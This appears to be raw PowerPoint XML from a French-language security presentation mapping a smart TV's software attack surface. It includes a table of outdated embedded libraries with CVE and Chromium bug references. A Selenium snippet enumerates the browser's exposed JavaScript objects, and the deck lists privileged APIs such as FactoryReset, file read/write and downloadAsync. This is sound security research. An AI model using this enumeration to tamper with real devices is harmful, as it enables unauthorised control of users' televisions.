                      <a:endParaRPr lang="fr-FR"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latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>https://bugs.chromium.org/p/chromium/issues/detail?id=831943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latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>https://bugs.chromium.org/p/chromium/issues/detail?id=913296</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="445504637"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="273032">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="800"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>libcurl </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>7.50.2 (Sept 2016)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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400" u="none" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>CVE-2017-1000100</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" u="none"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5655245"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="273032">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="800"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>libsqlite3 </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400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>3.21.0 (Oct 2017)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Magellan </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>vuln</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t> ?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2567419952"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="463409">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="800"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>libzint</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </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1400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>2.4 </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Bibliothèque logicielle pour encoder des données sous la forme de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>QRCode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t> ou codes barres</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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52958575"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="258760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="800"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>glibc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>2.18 (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Aug</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t> 2013)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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endParaRPr lang="fr-FR"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1388523"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187439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767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>API Javascript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{963D9FAD-FFBB-B218-54F9-D1FDB4DA3D53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1195904"/>
            <a:ext cx="8359774" cy="1277273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</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selenium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import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webdriver</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driver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>webdriver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">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Remote</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command_executor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'http://192.168.1.67:4444/'</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desired_capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>={</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>browserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cobalt'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'platform'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">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'linux</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JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object.keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>driver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">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execute_script</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JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BDEBA50-ABE9-2500-255A-8B05DCB48BDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5471160" y="1987965"/>
            <a:ext cx="3253740" cy="278977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err="1"/>
              <a:t>modeljs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9576C5D5-B890-5D5C-4B01-A01D911F016D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5623560" y="2286711"/>
            <a:ext cx="3001126" cy="1182299"/>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system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BFC38D6-F585-B361-BC77-DC9846E218A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5623560" y="3552009"/>
            <a:ext cx="3001126" cy="326094"/>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source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E87824B2-6590-F8EB-F77D-A0C30248B5F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5625788" y="3947394"/>
            <a:ext cx="2998897" cy="326094"/>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network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{725EAD75-14D6-7BEB-42FD-F7007B2E08C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5721919" y="2603360"/>
            <a:ext cx="1451812" cy="326094"/>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b="1" dirty="0" err="1"/>
              <a:t>setMachineName</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B869C0F3-518E-8025-CC40-A286B037227B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7272091" y="2610503"/>
            <a:ext cx="1225912" cy="326094"/>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err="1"/>
              <a:t>SwitchOffTv</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DC8C9E8-4789-4416-272E-15CA9C453925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5721920" y="2990615"/>
            <a:ext cx="1451812" cy="326094"/>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err="1"/>
              <a:t>FactoryReset</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF99AB91-1CDE-BD4D-96A3-ED43ED9CDEC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7256894" y="2990615"/>
            <a:ext cx="1241109" cy="326094"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F055730-B0C9-615C-CA8D-6262858013CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5625789" y="4327820"/>
            <a:ext cx="2998897" cy="326094"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EF32048-347F-E10D-0C51-901196FCC26A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450857" y="2571750"/>
            <a:ext cx="4893619" cy="2205991"/>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err="1"/>
              <a:t>hisense</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E8AFBC7-AFB7-3B89-B87B-C64739689531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563416" y="2890637"/>
            <a:ext cx="4668500" cy="1783030"/>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t>file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5768823B-2248-19AB-234E-EAB2335D601F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645997" y="3166867"/>
            <a:ext cx="2324564" cy="711236"/>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downloadAsync</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6CA373E-F694-B230-BB61-D74A62FDE46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3034036" y="3166867"/>
            <a:ext cx="2117084" cy="711236"/>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read</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D34F3BB-F5FC-AFE1-8E9F-1B7DABDCF2ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="3947394"/>
            <a:ext cx="2324563" cy="599766"/>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write</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B6F51D0-212E-CF23-F122-7028C5463599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3026975" y="3945758"/>
            <a:ext cx="2117084" cy="599765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solid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qrCode</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{055A5214-507E-D2BB-1D8F-C35B5AF03F5E}"/>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28" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8A1988-91E5-C9A8-D992-89417C22701E}"/>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Surface d’attaque logicielle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217813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BBBFBFC-4809-AFE7-A8ED-58DC81B9994C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F57660D9-695F-A8B5-1E35-E0BA7B139B5D}"/>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C80E0D5E-827C-281D-7C71-1A7A8E7ABC5C}"/>
              </a:ext>
            </a:extLst>
